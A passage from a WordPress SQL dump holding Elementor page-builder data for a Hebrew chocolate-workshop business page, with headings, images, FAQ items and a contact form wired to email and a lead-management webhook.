95,100,'_elementor_pro_version','2.9.4'),(1798,363,'_wp_page_template','elementor_header_footer'),(1799,363,'_elementor_edit_mode','builder'),(1800,363,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"bebc84a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"],\"webhooks\":\"https:\\/\\/api.leadmanager.co.il\\/handlers\\/lm\\/submit.cms?lm_form=34824&lm_key=fa721ea141794a3db374e600fc05ee2c\"},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"67cc34f9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"6c196b7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"7827cc50\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7b209b5a\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05de\\u05e9\\u05e8\\u05d3 \\/ \\u05d1\\u05d9\\u05ea (\\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5)\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05d4\\u05d9\\u05d5\\u05ea \\u05d1\\u05d9\\u05df \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05dc4\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05d0\\u05dc \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05e1\\u05d9\\u05e0\\u05e8, \\u05d6\\u05d4 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05db\\u05df, \\u05d0\\u05ea\\u05dd \\u05ea\\u05e7\\u05d7\\u05d5 \\u05d4\\u05d1\\u05d9\\u05ea\\u05d4 \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d4\\u05db\\u05e0\\u05ea\\u05dd (\\u05d0\\u05dd \\u05d9\\u05d9\\u05e9\\u05d0\\u05e8)\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}},{\"text\":\"\\u05dc\\u05d0, \\u05dc\\u05d0 \\u05de\\u05e9\\u05e0\\u05d4 \\u05db\\u05de\\u05d4 \\u05d0\\u05e0\\u05e9\\u05d9\\u05dd \\u05d9\\u05d4\\u05d9\\u05d5, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d7\\u05dc\\u05d9\\u05d8\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"},\"selected_icon\":{\"value\":\"fas fa-check\",\"library\":\"fa-solid\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"741268fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"2e2f4f1b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/06\\/logo1.png\",\"id\":190}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1801,363,'_elementor_version','2.7.5'),(1802,363,'_elementor_template_type','wp-post'),(1803,363,'_elementor_pro_version','2.7.3'),(1807,364,'_wp_page_template','elementor_header_footer'),(1808,364,'_elementor_edit_mode','builder'),(1809,364,'_elementor_data','[{\"id\":\"18f6a107\",\"elType\":\"section\",\"settings\":{\"stretch_section\":\"section-stretched\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"305b0fba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"50499c10\",\"elType\":\"widget\",\"settings\":{\"align\":\"center\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Open Sans Hebrew\",\"typography_font_size\":{\"unit\":\"px\",\"size\":17},\"typography_font_weight\":\"normal\",\"typography_text_decoration\":\"underline\",\"text_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"breadcrumbs\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4eb9f6ca\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"2d2198b2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":70},\"elements\":[{\"id\":\"79ff081e\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea (\\u05e7\\u05d8\\u05e0\\u05d5\\u05ea \\/ \\u05d2\\u05d3\\u05d5\\u05dc\\u05d5\\u05ea)\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"cdcd955\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/groups-choco.jpg\",\"id\":104},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"4d880f94\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>\\u05d0\\u05dd \\u05d0\\u05ea\\u05dd \\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05e7\\u05d7\\u05ea \\u05d9\\u05d5\\u05dd \\u05db\\u05d9\\u05e3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05de\\u05d4\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4, \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d4\\u05db\\u05d9\\u05e8 \\u05d0\\u05ea \\u05d4\\u05de\\u05ea\\u05db\\u05d5\\u05df \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05dc\\u05d0\\u05d9\\u05d2\\u05d5\\u05d3 \\u05d7\\u05d1\\u05e8\\u05d4 \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05de\\u05ea \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8.\\u00a0<\\/strong><\\/p><p>\\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05dc\\u05d0\\u05e8\\u05d2\\u05df \\u05d6\\u05d0\\u05ea \\u05d1\\u05e6\\u05d5\\u05e8\\u05d4 \\u05db\\u05d6\\u05d5 \\u05e9\\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05d1\\u05e7\\u05d1\\u05d5\\u05e6\\u05d4 \\u05d9\\u05ea\\u05d7\\u05dc\\u05e7\\u05d5 \\u05dc\\u05e7\\u05d1\\u05d5\\u05e6\\u05d5\\u05ea \\u05d5\\u05d9\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d0\\u05ea \\u05d4\\u05de\\u05e0\\u05d5\\u05ea \\u05d4\\u05d0\\u05d4\\u05d5\\u05d1\\u05d5\\u05ea \\u05e2\\u05dc\\u05d9\\u05d4\\u05dd, \\u05d4\\u05d7\\u05dc \\u05de\\u05dc\\u05d8\\u05de\\u05e4\\u05e8\\u05e8 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8\\u05d9\\u05dd \\u05dc\\u05e2\\u05d1\\u05d5\\u05d3\\u05d4 \\u05d5\\u05e2\\u05d3 \\u05dc\\u05e2\\u05e8\\u05d1\\u05d5\\u05d1 \\u05d5\\u05d6\\u05d9\\u05dc\\u05d5\\u05e3 \\u05dc\\u05e2\\u05d5\\u05d2\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05de\\u05d4\\u05e0\\u05d5\\u05ea \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d8\\u05e2\\u05d9\\u05dd \\u05d9\\u05d7\\u05d3 \\u05e2\\u05dd \\u05d4\\u05d7\\u05d1\\u05e8 \\u05e9\\u05d0\\u05ea\\u05dd \\u05e8\\u05d2\\u05d9\\u05dc\\u05d9\\u05dd \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d0\\u05d9\\u05ea\\u05d5 \\u05e1\\u05dc\\u05d8, \\u05dc\\u05d0 \\u05d4\\u05d2\\u05d9\\u05e2 \\u05d4\\u05d6\\u05de\\u05df \\u05dc\\u05d3\\u05e2\\u05ea \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05d9\\u05d7\\u05d3 \\u05d2\\u05dd \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7?\\u00a0<\\/p><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"bebc84a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h3>\\u05de\\u05d4 \\u05e2\\u05d5\\u05d3 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e2\\u05d5\\u05e9\\u05d9\\u05dd?<\\/h3><ul><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%96%D7%95%D7%92%D7%99%D7%AA\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea<\\/a><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A1%D7%93%D7%A0%D7%AA-%D7%A9%D7%95%D7%A7%D7%95%D7%9C%D7%93-%D7%9C%D7%99%D7%9C%D7%93%D7%99%D7%9D\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd<\\/a><\\/u><u><\\/u><\\/li><li><u><a href=\\\"https:\\/\\/www.chocolate4u.co.il\\/%d7%a1%d7%93%d7%a0%d7%aa-%d7%a9%d7%95%d7%a7%d7%95%d7%9c%d7%93-%d7%9c%d7%9e%d7%a1%d7%99%d7%91%d7%aa-%d7%a8%d7%95%d7%95%d7%a7%d7%95%d7%aa\\/\\\">\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea<\\/a><\\/u><\\/li><\\/ul>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"fd9ed4d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":30},\"elements\":[{\"id\":\"16c16700\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"76bff3cc\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\",\"recaptcha_badge\":\"bottomright\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\",\"recaptcha_badge\":\"bottomright\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\",\"recaptcha_badge\":\"bottomright\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"chocolate4u\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is 